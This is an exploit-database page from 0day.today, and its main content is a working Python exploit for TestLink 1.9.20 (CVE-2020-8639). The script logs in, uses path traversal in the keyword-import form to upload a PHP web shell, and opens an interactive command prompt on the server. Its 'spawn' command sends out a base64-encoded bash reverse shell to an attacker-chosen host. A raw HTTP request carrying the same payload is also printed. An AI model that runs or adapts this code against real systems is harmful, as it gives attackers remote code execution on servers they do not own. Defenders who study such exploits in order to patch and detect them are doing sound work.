0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TestLink 1.9.20 - Unrestricted File Upload (Authenticated) Exploit
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated)
# Exploit Author: snovvcrash
# Original Research by: Ackcent AppSec Team
# Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/
# Vendor Homepage: https://testlink.org/
# Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code
# Version: 1.9.20
# Tested on: Ubuntu 20.10
# CVE: CVE-2020-8639
# Requirements: pip3 install -U requests bs4
# Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink
"""
Raw exploit request:
POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067
Content-Length: 1187
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1
Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f
Upgrade-Insecure-Requests: 1
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="CSRFName"
CSRFGuard_1115715115
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="CSRFToken"
506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="importType"
/../../../logs/pwn.php
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="MAX_FILE_SIZE"
409600
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml"
Content-Type: application/xml
<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="tproject_id"
1
-----------------------------242818621515179709592867995067
Content-Disposition: form-data; name="UploadFile"
Upload file
-----------------------------242818621515179709592867995067--
"""
#!/usr/bin/env python3
import re
from urllib import parse
from cmd import Cmd
from base64 import b64encode
from argparse import ArgumentParser
import requests
from bs4 import BeautifulSoup
parser = ArgumentParser()
parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"')
parser.add_argument('-u', '--username', default='admin', help='TestLink username')
parser.add_argument('-p', '--password', default='admin', help='TestLink password')
parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"')
args = parser.parse_args()
class TestLinkWebShell(Cmd):
payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>"""
uploadPath = 'logs/pwn.php'
prompt = '$ '
def __init__(self, target, username, password, proxies):
super().__init__()
self.target = target
self.username = username
self.password = password
if proxies:
self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'}
else:
self.proxies = None
self.session = requests.Session()
self.session.verify = False
resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies)
soup = BeautifulSoup(resp.text, 'html.parser')
self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value')
self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value')
self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value')
self.destination = soup.find('input', {'name': 'destination'}).get('value')
def auth(self):
data = {
'CSRFName': self.csrf_name,
'CSRFToken': self.csrf_token,
'reqURI': self.req_uri,
'destination': self.destination,
'tl_login': self.username,
'tl_password': self.password
}
resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies)
if resp.status_code == 200:
print('[*] Authentication succeeded')
resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies)
if resp.status_code == 200:
print('[*] Loaded mainPage.php iframe contents')
soup = BeautifulSoup(resp.text, 'html.parser')
self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href')
self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0]
print(f'[+] Extracted tproject_id value: {self.tproject_id}')
else:
raise Exception('Error loading mainPage.php iframe contents')
else:
raise Exception('Authentication failed')
def upload_web_shell(self):
files = [
('CSRFName', (None, self.csrf_name)),
('CSRFToken', (None, self.csrf_token)),
('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')),
('MAX_FILE_SIZE', (None, '409600')),
('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)),
('tproject_id', (None, self.tproject_id)),
('UploadFile', (None, 'Upload file'))
]
resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies)
if resp.status_code == 200:
print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}')
print('[*] Trying to query whoami...')
resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies)
if resp.status_code == 200:
print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}')
else:
raise Exception('Error interacting with the web shell')
else:
raise Exception('Error uploading web shell')
def emptyline(self):
pass
def preloop(self):
self.auth()
self.upload_web_shell()
def default(self, args):
try:
resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies)
if resp.status_code == 200:
print(resp.text.strip())
except Exception as e:
print(f'*** Something weired happened: {e}')
def do_spawn(self, args):
"""Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\"."""
try:
lhost, lport = args.split()
payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
b64_payload = b64encode(payload.encode()).decode()
cmd = f'echo {b64_payload} | base64 -d | /bin/bash'
self.default(cmd)
except Exception as e:
print(f'*** Something weired happened: {e}')
def do_EOF(self, args):
"""Use Ctrl-D to exit the shell."""
print(); return True
if __name__ == '__main__':
tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy)
tlws.cmdloop('Type help for list of commands')
# 0day.today [2024-11-15] #